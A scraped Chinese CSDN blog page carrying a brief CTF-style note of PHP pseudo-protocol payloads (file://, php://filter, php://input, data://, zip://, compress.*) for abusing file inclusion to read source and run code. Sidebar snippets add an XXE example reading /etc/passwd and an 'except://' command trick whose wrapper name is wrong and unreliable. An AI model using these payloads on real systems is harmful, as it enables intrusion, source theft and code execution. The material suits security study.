利用伪协议实现命令执行

最新推荐文章于 2024-04-14 05:15:00 发布
最新推荐文章于 2024-04-14 05:15:00 发布
阅读量267 收藏 1
点赞数 1
分类专栏: 笔记 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53498616/article/details/114227954
版权 
访问本地文件:
?c=file://[文件绝对路径]
文件源码读取:
?c=php://filter/read=convert.base64-encode/resource=[文件名]
php代码执行:
?c=php://input  再经过POST请求执行命令
?c=data://text/plain,[php代码]
?c=data://text/plain;base64,[base64加密后的代码]
访问压缩文件中的子文件:
?c=zip://[压缩文件绝对路径]#[压缩文件内的子文件名]
//下面两种用于.zip无法直接上传而命名为.jpg时
?c=compress.bzip2://[压缩文件绝对路径或相对路径]
?c=compress.zlib://[压缩文件绝对路径或相对路径]
Ryuuz4k1
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP代码审计之任意文件读取
qq_22132931的博客
12-02 643
PHP代码审计之任意文件读取
伪协议利用
一只web狗
06-23 1654
PHP伪协议PHP带有很多内置URL风格的封装协议,可用于类似fopen()、copy()、file_exists()和filesize()的文件系统函数。
PHP伪协议
m0_75178803的博客
04-02 1171
可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行,从而导致任意文件读取协议参数:常用的有。
php 读取本地文件
qq_27487739的博客
05-15 2654
函数:使用文件指针读取文件的内容(可以逐行读取读取指定字节数量的数据)。函数读取指定文件的内容,并将每一行存储在。函数:读取整个文件并将其作为字符串返回。每一行的结尾都会包含一个换行符。函数返回指定文件的内容,并将其存储在。函数打开指定文件,并将文件指针存储在。指针所指向的文件的内容,并将其存储在。如果你想逐行读取文件的内容,可以使用。函数读取文件的内容,并将其存储在。如果遇到文件结束符,则。在上面的示例中,我们首先使用。函数:将文件内容读入数组。在上面的示例中,我们使用。函数关闭打开的文件
PHP中的文件处理:PHP 读取文件
最新发布
新华编程特战队
04-14 974
无论是读取纯文本文件、CSV 文件、JSON 文件还是 XML 文件PHP 都提供了强大的解决方案来提取和操作其中的信息。在 PHP读取文件涉及打开文件读取其内容并根据获得的数据执行操作。在此示例中,使用 readfile() 读取文件“example.txt”,读取的字节数存储在 $bytesRead 变量中。通过打开文件并使用适当的功能,开发人员可以读取文本文件、CSV 文件、JSON 文件等的内容。在 PHP读取文件是一项基本操作,它允许开发人员访问和提取存储在文件中的数据。
php伪协议.pdfphp伪协议.pdfphp伪协议.pdf
02-24
PHP 伪协议是一种特殊的 URL 格式,用于在 PHP 代码中执行特定的操作。这些伪协议主要用于处理文件读取、网络请求以及数据处理等方面。理解并恰当地使用 PHP 伪协议对于开发安全、高效的 PHP 应用程序至关重要。 ##...
TCPIP协议详解卷2:实现
07-26
TCPIP协议详解卷2:实现 pdf版,有目录,完美阅读体验。 中文书名:TCP/IP详解 卷2:实现 英文书名:TCP/IP Illustrated, Volume 2: The Implementation 作者:(美) Gary R. Wright ,W. Richard Stevens 译者:陆...
ICMP.rar_ICMP的实现过程_icmp
09-22
**ICMP协议的实现过程**大致分为以下几个步骤: 1. **生成ICMP报文**:当网络中发生特定情况(如数据包无法到达目的地)时,源或目标主机的网络层会生成一个ICMP报文,填充相应的类型、代码和可能的数据。 2. **...
Telnet 命令 详解.pdf
08-29
- **远程会话**:一旦认证成功,用户就可以开始与远程主机的交互,执行各种命令和服务,就好像直接坐在远程主机前一样。 #### 三、Telnet协议的技术细节 Telnet协议采用了多种技术来实现远程登录,包括但不限于: ...
金山WPS Mail邮件客户端远程命令执行漏洞(Mozilla系XUL程序利用技巧) _ 乌云漏洞库,乌云镜像站, WooYun
08-03
一旦攻击者成功触发这个XSS(跨站脚本)漏洞,他们可以利用Thunderbird的特定协议处理机制,如`imap`和`mailbox`伪协议,进一步扩大攻击范围。`imap`协议常用于访问IMAP服务器上的邮件,而`mailbox`则用于处理POP...
任意文件读取
qq_45953122的博客
08-31 981
一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是源代码文件,配置文件,敏感文件等等。
【JavaSE专栏71】File类文件读写,对计算机中的文件进行读取和写入操作
Designer 小郑的技术博客
08-09 2303
本文讲解了 Java 中 File 类文件读写的方式,也演示了 Java 读写 txt 文档的流程,并给出了样例代码,文件读写是指通过程序对计算机中的文件进行读取和写入操作,通过文件读写,可以实现数据的持久化存储和读取
四、文件包含漏洞[伪协议读取文件命令执行]
黑日里不灭的light
10-30 552
php://input:一般配合post输入,它提供了一种直接获取 POST 请求数据的方式,尤其适用于处理来自客户端的原始数据。php://filter:用于对流进行各种过滤或转换操作,允许你在读取或写入流数据之前对其进行处理。file://:用来访问本地文件
任意文件读取及漏洞复现
来日可期的博客
08-31 3376
任意文件上传漏洞指的是攻击者可以通过绕过应用程序的文件上传功能,向服务器上传恶意文件,包括脚本文件、木马程序等,从而执行任意代码或获取系统敏感信息。
任意文件读取 下载漏洞总结_任意文件下载漏洞(3)
m0_60607675的博客
04-09 880
当我们不知道路径是什么的情况下,这个可以说是一个核武器了,我们利用任意文件下载漏洞将mlocate.db文件下载下来,利用locate命令将数据输出成文件,这里面包含了全部的文件路径信息。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
php伪协议实现命令执行,任意文件读取
qq_44418229的博客
06-09 6429
ctf----php伪协议
php任意文件读取
不忘初心,护天下安全!
08-13 525
php://filter/read=convert.base64-encode/resource=index.php
ssrf总结
weixin_44576725的博客
05-01 1724
SSRF总结 简介 服务端请求伪造(Server Side Request Forgery, SSRF)指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。SSRF可以对外网、服务器所在内网、本地进行端口扫描,攻击运行在内网或本地的应用,或者利用File协议读取本地文件。 原理 SSRF漏洞形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。例如,黑客操作服务端从
php协议任意文件读取
weixin_33763244的博客
06-11 1280
php://filter/read=convert.base64-encode/resource=index.php 转载于:https://www.cnblogs.com/iAmSoScArEd/p/10575939.html
在pikachu靶场平台利用XXE漏洞调用except伪协议调用系统命令执行系统命令
05-23
首先需要了解什么是XXE漏洞,它是指攻击者可以通过向Web应用程序发送恶意XML文件来触发应用程序内部的XML解析器,并导致攻击者能够读取任意文件执行任意命令等攻击。 接下来,我们需要利用XXE漏洞调用except伪协议执行系统命令。except伪协议是一种在XML文档中嵌入任意数据的方法,它的语法如下: ``` <!ENTITY name SYSTEM "file:///path/to/file"> ``` 其中name为实体名称,可以在XML文档中通过&name;来引用,file:///path/to/file为要读取文件路径。 我们可以利用这个语法来执行系统命令,具体步骤如下: 1. 构造包含XXE漏洞的XML文件,例如: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <foo>&xxe;</foo> ``` 这个XML文件包含一个名为xxe的实体,它的值为file:///etc/passwd,表示要读取/etc/passwd文件。 2. 将XML文件发送到目标应用程序,并触发XXE漏洞。如果漏洞存在,则应用程序会解析XML文件,并读取xxe实体的值。 3. 修改实体的值,将它改为要执行的系统命令。例如: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "except://`ls /`"> ]> <foo>&xxe;</foo> ``` 这个XML文件将xxe实体的值改为了except://`ls /`,表示要执行ls /命令。 4. 再次发送XML文件到目标应用程序,触发XXE漏洞,并执行系统命令。 需要注意的是,如果目标系统禁止了except伪协议,则无法利用这种方法执行系统命令。此外,执行系统命令可能会产生安全风险,建议仅在测试环境中使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值